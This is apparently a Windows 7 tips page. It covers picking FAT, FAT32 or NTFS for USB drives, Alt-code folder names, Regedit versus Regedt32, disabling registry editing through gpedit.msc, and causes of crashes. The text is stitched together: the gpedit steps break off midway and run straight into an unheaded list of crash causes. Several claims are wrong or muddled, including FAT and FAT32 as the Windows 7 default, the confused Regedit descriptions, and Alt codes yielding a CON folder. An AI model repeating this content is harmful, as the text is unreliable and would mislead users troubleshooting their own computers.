Different file systems in Windows 7

Introduction :

• In windows 7, you will see different file systems :  

• FAT, FAT32, exFAT, NTFS

• Don't choose/set FAT, FAT32 formatting option if data storage capacity of your USB flash drive is larger than 32GB.
• FAT32 does not support handling large files (over 4GB).
• In Windows XP and Windows 7 FAT and FAT32 file systems are by default.
• During a " Normal format " process, data is removed and scan is performed for bad sectors.
• During "Quick Format"  process, only data is removed, no scan is performed.

Which one is suitable for your USB Drive :

1. For USB flash drive size - 0bytes to 512MB - Go for FAT
2. For USB flash drive size - 512MB to 8192MB - Go for FAT32 
3. For USB flash drive size - 8192MB or larger - Go for NTFS

How to make folder with diffrent symbols name or Null or CON folder ..!!

->Guys we make our folder with our favorite name many times but have you ever tried to make your folder with Smiley, Heart, Sad face,Null(CON or AUX) etc as a folder name.
->Yes it's possible to make your folder name as symbol just follow the given instruction

Solution :

• Press right click of your mouse
• Find "New" option from it.
• Click on "Folder" option to make new folder
• This folder is named as "New folder" by default
• Now press "Alt+Number" then press "Enter"
• It'll change your folder name as the number symbol

Note : Press right side "Alt" button

• You can add any number between 1 to 255 for different symbol with Alt button.
• First press "Alt  button" & must hold it while you enter the number.

Difference between Regedit.exe & Regedit32.exe

1) Regedit.exe :

• It's a configuration editor for Windows XP and Windows Server 2003. 
• It included with Windows NT 4.0 and Windows 2000 primarily for its search capability. You can use Regedit.exe to make changes in the Windows NT 4.0 and Windows 2000 registry, but cannot view or edit all functions or data types on Windows NT 4.0 and Windows 2000.
• Limitation :
• cannot save or restore keys as hive files.
• cannot set the security for registry keys
• cannot view, edit, or search the value data types <>REG_EXPAND_SZ and <>REG_MULTI_SZ. If you try to view  it'll show binary data type
• Support importing and exporting registration entries (.reg) files.

 2) Regedt32.exe :

• It's a configuration editor for Windows NT 4.0 and Windows 2000.
• This editor allows you to view or modify the Windows NT registry.
• The editor provides views of windows that represent sections of the registry, named hives. Each window displays two sections. On the left side, there are folders that represent registry keys. On the right side,there are the values associated with the selected registry key.
• Regedt32 is a powerful tool, where you change registry values. Incorrect values in the registry can make the Windows installation unusable.
• Not support importing and exporting registration entries (.reg) files.

How to Disable Registry editing tools in any computer ..?

Solution :

• Goto "Run(windows key + R)" type "gpedit.msc" press "OK"
  

  

  Run - gpedit.msc

• Now select "User Configuration" you'll get 3 folder list select "Administrative Templates"

1) Hardware Conflict :

• Each H/W device communicates to other devices through an interrupt request channel (IRQ). It's  unique for each device.

• Keyboard usually uses IRQ 1
• Printer usually connects internally on IRQ 7.
• if they are not installed properly, two of them may end up sharing the same IRQ number. When the user tries to use both devices at the same time, a crash can happen.

2) Bad Ram :

• Gives Fatal Exception Error that indicates a serious H/W problem. Sometimes it may mean a part is damaged and will need replacing. It cause because of miss match of chip.

3) BIOS settings :

• Every motherboard is supplied with a range of chipset settings that are decided in the factory. To access these settings is to press the F2 or delete button during the first few seconds of a boot-up.
• Common BIOS error concerns the CAS latency. This refers to the Ram. Older EDO (extended data out) Ram has a CAS latency of 3. Newer SDRam has a CAS latency of 2. Setting the wrong figure can cause the Ram to lock up and freeze the computer's display.

4) Hard disk drives :

• After a few weeks, the information on a hard disk drive starts to become fragmented. It is a good to do defragment the hard disk every week.Hard disks will slow down and crash if they are too full. Do some housekeeping on your hard drive every few months and free some space on it. Open the Windows folder on the C drive and find the Temporary Internet Files folder. Deleting the contents (not the folder) can free a lot of space.
